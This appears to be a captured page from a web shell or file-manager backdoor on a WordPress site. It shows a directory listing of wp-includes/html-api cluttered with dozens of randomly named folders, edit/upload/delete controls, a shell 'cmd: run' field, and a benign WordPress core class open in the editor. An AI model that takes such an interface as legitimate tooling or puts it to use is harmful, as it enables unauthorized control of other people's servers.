/
home
/
vianto5
/
cititower.mx
/
wp-includes
/
html-api
/
/home/vianto5/cititower.mx/wp-includes/html-api
mkdir
upload
Name
Size
Mode
Actions
1bgtkda/
-
0755
rm
1bvfwch/
-
0755
rm
1dqvpez/
-
0755
rm
1kenidz/
-
0755
rm
agnxdiw/
-
0755
rm
alzsgxp/
-
0755
rm
amqorwz/
-
0755
rm
b1sljhm/
-
0755
rm
bdpshyw/
-
0755
rm
bejmtxy/
-
0755
rm
bgaoljz/
-
0755
rm
cgvudnh/
-
0755
rm
cmiykvl/
-
0755
rm
crinxlz/
-
0755
rm
cuwyxse/
-
0755
rm
cy1uzvn/
-
0755
rm
czyojhp/
-
0755
rm
dcigmwk/
-
0755
rm
dimqtpv/
-
0755
rm
extjzbg/
-
0755
rm
fbhdszq/
-
0755
rm
flxygnw/
-
0755
rm
fnxugmd/
-
0755
rm
fwsklxu/
-
0755
rm
fxahtlo/
-
0755
rm
gdwrbvx/
-
0755
rm
gfrzxhw/
-
0755
rm
gnrpmak/
-
0755
rm
goimuyj/
-
0755
rm
hdvzlig/
-
0755
rm
homkiue/
-
0755
rm
hrxptzl/
-
0755
rm
izmrvjd/
-
0755
rm
jaqthei/
-
0755
rm
jasohry/
-
0755
rm
knhajev/
-
0755
rm
kovhnpl/
-
0755
rm
kpgzude/
-
0755
rm
kr1qguz/
-
0755
rm
lajyvch/
-
0755
rm
lcfwjds/
-
0755
rm
lescupf/
-
0755
rm
loimjr1/
-
0755
rm
lvptwnx/
-
0755
rm
m1ktwbx/
-
0755
rm
mabrsl1/
-
0755
rm
mizuabo/
-
0755
rm
niwkpoe/
-
0755
rm
nszb1op/
-
0755
rm
oetvcr1/
-
0755
rm
olbzhks/
-
0755
rm
olgihzy/
-
0755
rm
ox1vgyw/
-
0755
rm
oxfspij/
-
0755
rm
oxpkljd/
-
0755
rm
pemongl/
-
0755
rm
pltywhv/
-
0755
rm
pqonyvw/
-
0755
rm
psmuaob/
-
0755
rm
qendtga/
-
0755
rm
qnklcyd/
-
0755
rm
qokubwe/
-
0755
rm
rbdiqat/
-
0755
rm
rlfncag/
-
0755
rm
rsateox/
-
0755
rm
sbokea1/
-
0755
rm
skzimg1/
-
0755
rm
sqmaodn/
-
0755
rm
t1aubch/
-
0755
rm
tk1pdhv/
-
0755
rm
toqdkcg/
-
0755
rm
twudoni/
-
0755
rm
twvnq1d/
-
0755
rm
udbjnoy/
-
0755
rm
udieo1q/
-
0755
rm
ufwtscq/
-
0755
rm
uidokar/
-
0755
rm
vixwcdb/
-
0755
rm
vqtymok/
-
0755
rm
wskcerd/
-
0755
rm
wxh1tes/
-
0755
rm
wyq1znv/
-
0755
rm
xilrucf/
-
0755
rm
zhgujbo/
-
0755
rm
zijvqxe/
-
0755
rm
zrxaecg/
-
0755
rm
.htaccess
178
0644
edit
dl
rm
class-wp-html-active-formatting-elements.php
7264
0644
edit
dl
rm
class-wp-html-attribute-token.php
2775
0644
edit
dl
rm
class-wp-html-decoder.php
16692
0644
edit
dl
rm
class-wp-html-doctype-info.php
25382
0644
edit
dl
rm
class-wp-html-open-elements.php
22478
0644
edit
dl
rm
class-wp-html-processor-state.php
11335
0644
edit
dl
rm
class-wp-html-processor.php
213439
0644
edit
dl
rm
class-wp-html-span.php
1099
0644
edit
dl
rm
class-wp-html-stack-event.php
1639
0644
edit
dl
rm
class-wp-html-tag-processor.php
151294
0644
edit
dl
rm
class-wp-html-text-replacement.php
1409
0644
edit
dl
rm
class-wp-html-token.php
3410
0644
edit
dl
rm
class-wp-html-unsupported-exception.php
3606
0644
edit
dl
rm
html5-named-character-references.php
80163
0644
edit
dl
rm
Edit:
/home/vianto5/cititower.mx/wp-includes/html-api/class-wp-html-stack-event.php
(1639B)
<?php /** * HTML API: WP_HTML_Stack_Event class * * @package WordPress * @subpackage HTML-API * @since 6.6.0 */ /** * Core class used by the HTML Processor as a record for stack operations. * * This class is for internal usage of the WP_HTML_Processor class. * * @access private * @since 6.6.0 * * @see WP_HTML_Processor */ class WP_HTML_Stack_Event { /** * Refers to popping an element off of the stack of open elements. * * @since 6.6.0 */ const POP = 'pop'; /** * Refers to pushing an element onto the stack of open elements. * * @since 6.6.0 */ const PUSH = 'push'; /** * References the token associated with the stack push event, * even if this is a pop event for that element. * * @since 6.6.0 * * @var WP_HTML_Token */ public $token; /** * Indicates which kind of stack operation this event represents. * * May be one of the class constants. * * @since 6.6.0 * * @see self::POP * @see self::PUSH * * @var string */ public $operation; /** * Indicates if the stack element is a real or virtual node. * * @since 6.6.0 * * @var string */ public $provenance; /** * Constructor function. * * @since 6.6.0 * * @param WP_HTML_Token $token Token associated with stack event, always an opening token. * @param string $operation One of self::PUSH or self::POP. * @param string $provenance "virtual" or "real". */ public function __construct( WP_HTML_Token $token, string $operation, string $provenance ) { $this->token = $token; $this->operation = $operation; $this->provenance = $provenance; } }
Save
cmd:
run